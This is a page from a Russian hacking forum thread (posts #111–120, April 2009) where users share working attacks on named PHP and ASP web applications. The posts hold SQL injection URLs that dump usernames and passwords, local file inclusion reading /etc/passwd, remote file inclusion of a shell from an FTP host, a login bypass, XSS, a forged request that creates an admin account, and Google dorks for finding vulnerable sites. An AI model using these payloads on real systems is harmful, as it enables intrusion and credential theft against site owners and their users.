ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #111  
Старый 20.04.2009, 21:16
Аватар для [underwater]
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию

Bahar Download Script
D

Download: http://www.aspdepo.org/indir2.asp?id=1085

Турки жгут))

Код:
http://www.site.com/patch/aspkat.asp?kid=28%20union+select+all+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+admin

ltaweb Alısveris Sistem

Download: http://www.aspindir.com/goster/5631

Код:
http://shop/urunler.asp?catno=38%20union+select+all+0,1,uname, upass,4,5,6,7,8,9,10,11,12+from+users
BloofoxCMS
Download: http://www.bloofox.com/download.21.html

magic_quotes_gpc = Off
register_globals = On

LFI:

Код:
http://site/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00
wsCMS
Google dork: Powered by wsCMS

SQL Inj:
Код:
http://site.com/news.php?id=-1234+union+select+1,concat(username,char(58),user_ password)+from+phpbb_users+limit+1,1--
Blind SQL Inj:

Код:
http://site.com/news.php?id=1 and substring(@@version,1,1)=4
http://site.com/news.php?id=1 and substring(@@version,1,1)=5
Virtual War

Google Dork: Powered by Virtual War

Код:
http://site.com/extra/online.php?n=_member%20WHERE%20memberid=-999%20UNION%20SELECT%200,%43%4F%4E%43%41%54%28%6D% 65%6D%62%65%72%69%64%2C%30%78%33%41%2C%6E%61%6D%65 %2C%30%78%33%41%2C%70%61%73%73%77%6F%72%64%29%2C%3 2%0A%20FROM%20vwar_member%20%20/*
Online Universal Payment System System

Код:
http://site.com/index.php?read=../../../../../../../../../../etc/passwd

Последний раз редактировалось [underwater]; 20.04.2009 в 23:59..
 
Ответить с цитированием

PastelCMS 0.8.0
  #112  
Старый 21.04.2009, 14:02
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию PastelCMS 0.8.0

PastelCMS 0.8.0
Сайт: http://pastel.pri.ee/

SQL-injection
При magic_quotes_gpc=off

Уязвимый код:
index.php
PHP код:
. . .
$sql_up $mysql->query("SELECT * FROM ".$conf['mysql_prefix']."menu_struct WHERE id='$_GET[id]'");
$menu_up $mysql->fetch_array($sql_up);
. . . 
Эксплуатация:
Цитата:
http://site.ru/?id=-1'+union+select+1,concat_ws(0x2F,user,pass),3,4,5, 6,7,8,9,10,11,12,13,14+from+users--+
Authorization bypass
При magic_quotes_gpc=off

Уязвимый код:
admin.php
PHP код:
if($_GET['log'] == 'in') {
    if(
$_POST['user'] != '' && $_POST['pass'] != '') {
        
$sql $mysql->query("SELECT * FROM ".$conf['mysql_prefix']."users WHERE user='$_POST[user]' AND pass='".md5($_POST['pass'])."'");
        
$count $mysql->num_rows($sql);
. . . 
Эксплуатация:
В поле Username: ' or 1=1#
В поле Password что угодно

Последний раз редактировалось ElteRUS; 21.04.2009 в 14:09..
 
Ответить с цитированием

  #113  
Старый 22.04.2009, 21:54
Аватар для [underwater]
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию

eXopera

Download: http://www.exopera.be/

Уязвимость в файле product.php:
Blind SQL Inj:

Код:
http://site.com/product.php?catid=1 and substring(@@version,1,1)=4
Код:
http://site.com/product.php?catid=1 and substring(@@version,1,1)=5

cpCommerce


Download: http://cpcommerce.cpradio.org/downloads.php

Уязвимость в файле document.php:
Blind SQL Inj:

Код:
http://site.com/document.php?id_document=1 and substring(@@version,1,1)=4
Код:
http://site.com/document.php?id_document=1 and substring(@@version,1,1)=5
 
Ответить с цитированием

CMSSite Vulnerabilities
  #114  
Старый 22.04.2009, 23:21
Аватар для Dimi4
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию CMSSite Vulnerabilities

CMSSite Vulnerabilities

Found by: Dimi4 [UASC]
Date: 22.04.09


XSS (search.php) :

Код:
http://localhost/CMSSite/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=0&y=0
LFI: admin.php

PHP код:
    if(file_exists("$admin_dir/".$_REQUEST["mode"].".php") &&  $_REQUEST["mode"] != "delete" &&  $_REQUEST["mode"] != "logout")
    {
        include(
"$admin_dir/".$_REQUEST["mode"].".php");
    } 
Код:
/admin.php?mode=[path]//////////////////[..]
 
Ответить с цитированием

  #115  
Старый 23.04.2009, 19:17
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Limeware CMS
Сайт: http://limeware-cms.com/

SQL-injection
При magic_quotes_gpc=off

Уязвимый код:
displayNews.php
PHP код:
. . .
 if (
strlen($_GET['id']) > 0) {
                
$this->id $_GET['id'];
            } else {
                
$this->id 0;  
. . .
 
$query sprintf("SELECT id,title,author,date,body FROM %s WHERE id = '%s'"$this->tblnews$this->id);
        
$this->newsResult $this->DB_executeQuery($query$this->newsLink);
. . . 
Эксплуатация:
Цитата:
site.com/index.php?type=news&block=1&id=22'+and+1=2+union+s elect+1,concat_ws(0x2F,username,password),3,4,5+fr om+tblusers--+
 
Ответить с цитированием

Уязвимости Ninja Blog
  #116  
Старый 26.04.2009, 18:00
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию Уязвимости Ninja Blog

Уязвимости Ninja Blog
download: http://www.ninjadesigns.co.uk/enter/blog.zip
dork: "Powered by Ninja Designs"

RFI

/entries/index.php
уязвимый код:
PHP код:
 <?php
if (isset($_GET["cat"])) {
    
$page $_GET["cat"].'.txt';
        if (
file_exists($page))  {                               
            echo 
"<br /><a href=\"index.php\">< Back</a>";
            @include (
"$page");
эксплуатирование:
Код:
/entries/index.php?cat=ftp://login:pwd@host/shell.txt%00

(с) Iceangel_

Последний раз редактировалось Iceangel_; 26.04.2009 в 18:32..
 
Ответить с цитированием

  #117  
Старый 26.04.2009, 23:09
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

TeamCal Pro Version 3.2.003
Downloads:http://www.lewe.com/index.php?option=com_docman&task=cat_view&gid=112& Itemid=45
Dork:Powered by TeamCal

можем добавить админа

уязвимый код

/addprofile.php
Код:
/**
 * Check if allowed 
 */
if (!checkAuth("admin")) {
   // Not authorized. Get outta here
   jsReload("index.php"); <- тут java-redirect!
}
эксплуатация:
Код:
/addprofile.php 
отправляем POST запрос типа
username=1234567&password=1234&password2=1234&lastname=&firstname=&title=&position=&idnumber=&phone=&mobile=&email=&birthday=&opt_gender=ut_male&uo_language=english&uo_defgroup=default&lbxNotifyGroup=All&opt_usertype=ut_admin&custom1=&custom2=&custom3=&custom4=&custom5=&customFree=&customPopup=&btn_add=Add
все
admin:1234567
pass:1234

(с)Rubaka
 
Ответить с цитированием

  #118  
Старый 27.04.2009, 11:15
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

PluggedOut Blog
download: http://downloads.sourceforge.net/pluggedout/blog199i.zip
dork: "Powered by PluggedOut Blog"

LFI

уязвимый код:

index.php

PHP код:
if ( isset($_REQUEST["entryid"]) ){

        if (
is_numeric($_REQUEST["entryid"])){
            
$html html_view_entry($_REQUEST["entryid"]) 
cмотрим функцию html_view_entry в файле html.php

PHP код:
function html_view_entry($entryid){
    
/--/
    
// Build the page
    
$html build_page($sql_list,$sql_view,$sql_archive,$sql_categories,$sql_comments);
        
    return 
$html
cмотрим функцию build_page, в этом же файле


PHP код:
function build_page($sql_list,$sql_view,$sql_archive,$sql_categories="",$sql_comments=""){

    global 
$theme;
    
    
// work out the current theme (allow for an override though)
    
if (isset($_REQUEST["theme"])){
        
$theme $_REQUEST["theme"];
    } else {
        
$theme theme_get_name();
    }

    
// include the theme (in order for following function calls to work)
    
if (file_exists("themes/".$theme."/theme.php")){
        require 
"themes/".$theme."/theme.php";
    } else {
        
header("Location: problem.php?f=build_page&p=theme_not_found");
    } 


эксплуатирование:
Код:
index.php?entryid=1&theme=../../../../../../../etc/passwd%00

(с) Iceangel_
 
Ответить с цитированием

  #119  
Старый 28.04.2009, 00:46
Аватар для [underwater]
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию

FineArtPost

Download: http://www.fineartpost.com

XSS:
Код:
http://www.site.com/display_images.php?u_id=%22%3Cscript%3Ealert(1)%3C/script%3E%22

SQL Inj:

Код:
http://www.site.com/public/display_images.php?u_id=-210%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--
minimal-ablog 0.4


Download : http://code.google.com/p/minimal-ablog/downloads/list


SQL Inj:
Код:
http://www.site.com/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8--
Загружаем любые файлы с правами админа: http://www.site.com/admin/uploader.php
 
Ответить с цитированием

Уязвимости InTerra Blog Machine 1.70
  #120  
Старый 28.04.2009, 13:37
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию Уязвимости InTerra Blog Machine 1.70

Уязвимости InTerra Blog Machine 1.70
download: http://essentialmind.com/files/interra_en.zip
dork: "Powered by InTerra Blog Machine"

SQL-injection(требования: magic_quotes=off)
уязвимый код:
index.php
PHP код:
switch($_GET['action']){
/--/
case 
'section':    {
include(
"actions/section.php");
break;
}
/--/ 
/actions/section.php (напрямую к нему не обратится, хтаццесс в папке мешает)

PHP код:
  if(eregi('(.*)/$',$_GET['section'])){
        
$_GET['section'] = substr($_GET['section'],0,-1);
    }                 
    
//figure out section settings (if any)
    
if(!$section $db->getRow("SELECT * FROM int_category WHERE name = '".$_GET['section']."'")){
        
//is there a page maybe? (V 1.70)
        
if($page $db->getRow("SELECT * FROM int_pages WHERE url = '".$_GET['section']."'")){
/--/ 
эксплуатирование:
Код:
index.php?action=section&section=1'+and+1=2+union+select+1,2,version(),4--+
PoC:
Код:
http://evilbotan.ru/?action=section&section=1'+and+1=2+union+select+1,2,user(),4--+
(обратите внимание на имя домена, злой ботан =) )

(с) Iceangel_

Последний раз редактировалось Iceangel_; 28.04.2009 в 13:50..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ